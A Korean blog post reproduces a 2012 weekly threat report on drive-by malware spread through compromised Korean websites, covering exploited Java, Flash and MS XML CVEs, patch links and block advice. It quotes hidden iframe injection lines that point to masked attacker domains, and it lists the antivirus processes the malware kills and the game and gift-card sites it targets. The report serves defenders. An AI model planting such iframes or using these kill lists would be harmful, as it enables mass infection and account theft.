  1. 악성링크가 공격에 활용에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치
  1. 내부 감염된 APT 공격의 확인  제거에 활용(기술 분석 문서 참고)


금주 차의 특징은 제로데이(CVE-2012-1889 MS XML Core Service) 취약성 공격은 7월 1주차 악성코드 분석에서 CVE-2012-1889 공격이 96%의 높은 비율을 보였으나 7월 2주차 해당 취약점에 대한 보안패치가 적용되며 31%로 급감한 상황입니다. 그러나 3주차 조사결과 100% 모든 악성링크에서 CVE-2012-1889를 포함한 공격이 이루어지고 있는 것으로 나타나 사용자들이 패치를 하지 않아 아직도 유효한 공격으로 판단 되고 있습니다. 그러므로 사용자들은 MS 패치를 반드시 해야 하며, 기업 및 기관에서는 패치 권고를 즉시 해야 할 것으로 판단 됩니다.




<공격에 사용된 악성링크중 CVE-2012-1889 포함비율>

7월 2주차부터 등장한 CVE-2012-1723을 이용한 공격이 7월 3주차에 들어 빈번하게 관찰되고 있습니다. "Oracle Java Applet Field Bytecode Verifier Cache Remote Code Execution" 으로 알려진 이 취약점인 의도적인 Type Confusion을 유발하여 권한이 상승된 상태에서 신뢰되지 않은 코드가 실행되도록 하여 악성코드를 다운로드 및 실행합니다. 해당 취약점은 2012년 6월 12일 최초 보고 되었으며, 6월 13일 보안 패치가 발표 된 상황입니다. (보안 패치 : http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html )

Inline image 2

<공격에 사용된 악성링크중 CVE-2012-1723 포함비율>


전체 악성링크의 개수가 지난 7월 2주에 비해 감소하였으나, CVE-2012-1723 취약점 이용 링크의 개수는 6배이상 늘어났음을 확인할 수 있다. 전체 공격 취약성 비율에서 Java 관련된(2012-0754, 2011-3544) 공격은 100% 포함되어 있는 것으로 관찰 되고 있습니다.. Java의 취약점을 가장 많이 이용하고 있다는 것은 그만큼 공격성공률이 높다는 것이므로 Java 취약성 관련 최신 패치를 반드시 적용해야 합니다.


Inline image 3

< 전체 악성링크의 감소와 1723 취약성 공격 포함 비율 챠트>


전주 대비 악성링크가 감소했으며 MS 패치로 인한 공격성공률의 감소로 인해 유포범위를 넓히기 위해 20여개의 사이트에 동일한 악성링크가 들어간 MalwareNet이 다시 활성화 되었습니다. 메타블로그 사이트에서도 악성코드를 유포하였기 때문에 많은 블로그 사용자들이 악성코드에 감염 되었을 것으로 추정되고 있습니다.




< 빛스캔의 PCDS에 수집된 Malwarenet 활동 - 1곳의 예  >

금주 차 공격에서 대규모 악성코드 감염을 위해 잘 사용되지 않던 CVE-2012-1723(Oracle Java Applet Field Bytecode Verifier Cache Remote Code Execution) 사용이 발견 되었으며 현재 공격 기법에 대해 전문분석이 진행 중이므로 빠른 시일 내에 전문분석으로 제공 할 수 있도록 하겠습니다.


모든 악성링크들은 초기에 사용자 브라우저 종류 및 버전을 체크하고 그에 맞는 공격 부분으로 분기를 합니다. 공격성공률을 확인하기 위한 통계 정보 수집은 항상 존재하며, 각 IE, Java, Flash 부분에 대한 권한 획득 부분으로 분기하여 그에 맞는 공격코드들을 실행합니다. 그 이후 PC의 권한을 획득하고 최종 악성코드들을 다운로드 하여 PC에 설치하게 됩니다.

금주 공격의 특징은 다음과 같습니다.

  • MalwareNet 재활성화 ( 5~20개 규모의 신규 Malwarenet 출현)
  • 빛스캔의 PCDS를 인지하여 통계사이트만 넣어 전략적인 흐름을 관찰중(10여개 사이트)
  • P2P  언론 매체를 통한 악성코드 유포뿐만 아니라, 호스팅업체, 거래 사이트, 온라인 쇼핑몰, 메타 블로그, ebook 등 다양한 사이트들을 활용한 악성코드 유포가 이루어지고 있다특히 메타 블로그 사이트 같은 경우 블로그의 글들을 모아서 보여주는 사이트에서 악성코드를 유포하여 이번주말에 많은 감염자가 발생됐을거라 예상된다.
  • 최초 악성링크 내에 추가적인 연결 링크들을 갖추고 있는 형태  다양한 취약성을 공격하는 하이브리드 형태의 악성링크 공격 계속
  • 다운로더 및 백도어 형태의 악성코드 유포 증가 – 향후 어떤 방식으로 진화할 지 주목하고 있습니다.
  • 게임 계정 이외에 문화상품권  게임머니 거래 사이트에 대한 계정 탈취 시도가 최초 발견 되었습니다.
  • 대부분의 게임 계정 탈취  백신 서비스 killing 계속 되었으며계정 탈취는 BHO 이용한 유형이 가장 많이 발견 되고 있어 해당 부분에 대한 전문분석은 6월 2주차에 전달해드린 악성 BHO 파일 분석에 자세히 기술되어 있습니다.
* 유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다. 저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’라고 정의 하고 있습니다.


금주 공격에 사용되었던 MalwareNet의 악성링크는 전자 카탈로그 솔루션 전문업체인 eyecatalog 이며, 메타블로그 사이트를 포함하여 20여개의 곳에서 동시에 악성코드 유포에 활용되었습니다. 악성링크로 직접 이용 됨에 따라 기술보고서에는 실제 링크가 기술되어 있습니다. 악성링크로 이용된 경로는 xxxxxxx.co.kr/catalog/xxx.js 입니다. 내부 소스를 보시면 다음과 같은 코드를 확인할 수 있습니다.
7월 20일 23시 05분 <iframe src='http://xxxxx.info/bei/index.html' width='100' height='0' frameborder='0'></iframe>
7월 22일 13시 43분 <iframe src='http://xxxxx1.info/bei/index.html' width='100' height='0' frameborder='0'></iframe>
7월 24일 15시 21분 <iframe src='http://xxxx2.info/beilei/index.html ' width='100' height='0' frameborder='0'></iframe>


해당 코드는 XML 취약점인 CVE-2012-1889, Java 취약점인 CVE-2012-0507, CVE-2011-3544이 사용되고 있으며 게임 계정 탈취에 악용되고 있습니다.
사용자 PC에 대한 직접적인 공격을 일으키는 취약성은 복합적으로 사용되고 있으며, 지금까지 많은 비중을 차지 하였던 MS XML 취약성 공격을 대폭 감소되었고 Java 취약성 및 Flash 취약성 공격은 예전과 같은 비율이나 상대적으로 높은 비율을 보이고 있습니다.
사용자 PC에 설치되는 악성코드들은 항상 백신을 우회해서 설치가 되고 또 계속해서 변형들이 출현하고 있는 현 상황에서 웹 서핑만 해도, 웹 서비스에 방문만 해도 감염이 되는 공격코드들은 창궐하고 있습니다.


현재 모든 솔루션들은 사후 대응에 중점을 두고 있는데, 가장 중요한 것은 사전에 대응이 되는 것이냐가 핵심입니다. 또한 발생 가능한 위험을 얼마나 컨트롤 할 수 있는지가 핵심이라 할 수 있으며, 문제 해결책을 찾을 수 있을 것입니다. 이번 XML 사안에서 보듯이 3주 가량 무방비 상태에서 노출이 되었으며 단 3주 만에 공격자들은 해당 취약성을 대거 이용하는 형태를 보일 정도로 빠른 적응력을 보이고 있습니다. 또한 현재에도 계속 취약점이 사용된다는 것은 사용자들이 업데이트를 하지 않고 있다는 것입니다. 반드시 패치하시기 바랍니다. 향후에도 패치가 없는 제로데이 출현 시 빠르게 공격에 활용 될 것으로 보이므로 사후 대응 측면보다는 사전에 위협을 제거할 수 있는 선제적인 대응력이 핵심이 되어야 할 것입니다.
  • Oracle Java 취약성, Adobe Flash 취약성 , MS의 XML , Midi 및 IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다. 특히 패치가 발표된 MS XML (CVE 2012-1889) 취약성의 경우 업데이트를 하지 않은 분은 반드시 업데이트를 적용 하시기 바랍니다.

  • 기술분석 보고서에 기술된 루트킷 및 키로거, 백도어 기능을 가진 악성코드들은, 사용자 PC의 드라이버 및 시스템 파일 교체, 윈도즈 서비스 등록등을 실행하고, 내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다. 또한 백도어 기능의 설치 시에는 시스템상의 백신 프로세스 Kill 이후에 루트킷 형태를 설치하고 이후 다운로드 받은 모든 악성코드와 실행 주체를 삭제하여 정체를 은폐하고 있으므로 사전 대응에 만전을 기하세요.
  • 기술분석보고서에 언급된 게임계정 유출 악성코드들은 전체 악성코드의 80% 이상이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다. 모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다.



Diablo III에 대한 공격이 추가된 게임 계정 모니터링 및 백신 Kill 항목, 게임 머니 및 문화상품권 정보 탈취 계속

* 본 내용은 최근의 악성코드들이 기본적으로 탑재하고 있는 기능이며 6월 4주차 까지 발견 되었던 백신과 게임 계정 탈취 이외에도 문화상품권과 게임 머니 사이트에 대한 계정 탈취 기능이 추가 되어 계속 활용 되고 있습니다. 정보유출 수준이 상당 수준으로 판단 되고 있습니다.

프로세스명

프로그램명

백 신

sgbider.exe, vcsvc.exe

vcsvcc.exe

바이러스체이서

NVCAgent.npc, nsvmon.npc

Nsavsvc.npc, NaverAgent.exe

네이버백신

V3LRun.exe, MUpdate2.exe

SgSvc.exe

V3Light.exe, V3LTray.exe

V3LSvc.exe

V3

AYUpdSrv.aye,

AYRTSrv.aye, SkyMon.exe

AYServiceNT.aye

AYupdate.aye, AyAgent.aye

알약

PCOTP.exe

넥슨 OTP

게 임

gamehi.co.kr

게임하이

hangame.com

한게임

netmarble.net

넷마블

Raycity.exe

레이시티

ff2client.exe

피파 온라인2

pmang.com

피망

df.nexon.com, dnf.exe

던전 앤 파이터

DragonNest.exe, dragonnest.nexon.com

드래곤 네스트

WinBaram.exe, baram.nexon.com

바람의 나라

heroes.exe

마비노기 영웅전

wow.exe

월드 오브 워크래프트

lin.bin

리니지

MapleStory.exe

메이플 스토리

clubaudition.ndolfin.com

클럽 오디션

www.capogames.netsamwinfo.capogames.net

삼국지w

Diablo III.exe

디아블로III

게임머니&문화상품권

www.booknlife.com

북앤라이프

www.cultureland.co.kr

컬쳐랜드

www.happymoney.co.kr

해피머니

www.teencach.co.kr

틴캐시

본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다.

웹서비스 방문만으로도 감염이 되는 상황에 대한 설명이므로 강도 높은 주의가 필요한 상황입니다.


금주 공격에 사용된 취약성 비율

상세 분석 진행에 따라 취약성 판정 비율이 일정 부분 달라지고 있습니다만 큰 흐름은 차이가 없습니다.

Inline image 5


- CVE-2012-0507(
 14건, 24.6%) Java Applet 취약성 - Java Web start 취약성

http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html

- CVE 2011-3544(14건, 24.6% ) Java Applet 취약성

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

- CVE 2012-1889(14건, 24.6%) MS XML Core Service 취약성

http://technet.microsoft.com/ko-kr/security/advisory/2719615

- CVE 2012-0754 (3건, 5.3%) Flash 취약성 –

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

- CVE-2012-1723 (12건, 21.1%) 자바 애플릿 취약점

http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html


취약성 비율을 살펴 보시면 아시겠지만 XML 서비스에 대한 공격은 여전히 유효하며 Java 취약성들이 적극적으로 활용 되고 있는 상태를 확인 할 수 있습니다.

금주의 차단 추가 영역은 다음과 같습니다. 아래 영역은 이미 공격자가 권한을 통제하고 있는 IP대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다. 기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각 기관 및 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.

악성링크에 이용 되는 미국의 EGI Hosting 사의 IP 대역 상당수를 직접 악성링크로 활용한 사례가 발견 되어 해당 IP 대역에 대해 강력한 차단을 유지하실 것을 권고 합니다.


차단 권고 대역

* 기술 분석 보고서에는 별도의 차단 대역들이 존재하니 참고 하시고 사안별로 모니터링 및 차단에 적극 활용 바랍니다.


현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다. 또한 어떤 방식으로든 빛스캔의 악성링크 탐지와 분석 내용에 대해서 인지를 일부 하고 있는 것으로 판단 됩니다. 또한 금주의 총평으로는 제로데이의 패치, CVE-2012-1723으로 인한 MalwareNet의 재활성화 및 관찰입니다. 향후에도 이번 XML 관련 제로데이 사례에서 보듯 신규 취약성을 이용하는 사례는 계속 발생할 것으로 예상되고 있습니다. 대규모 유포 시도에 대해서 활용 된다면 언제나 가장 먼저 정보 제공이 가능함을 약속 드립니다.



본 정보제공 서비스는 공개, 배포 금지( 내부에서만 활용), 비영리 목적으로만 활용 가능합니다.


공익적인 목적으로 기관에 제공 되는 서비스들은 내부 사정에 의해 언제든 종료 될 수 있습니다.

감사합니다.


*시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다. KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다. 해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.


* 정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다. 본 서비스의 권리는 빛스캔에 있으므로 공개적 활용 및 영리적 목적으로 활용 하실 수 없습니다.


* 본 분석은 악성링크 자체의 수집은 빛스캔의 PCDS (Pre crime detect system)를 통해 수집하며, 악성링크 및 악성코드 분석은 KAIST 사이버보안연구센터, 정보보호대학원과 공동으로 진행합니다.


Posted by 바다란

댓글을 달아 주세요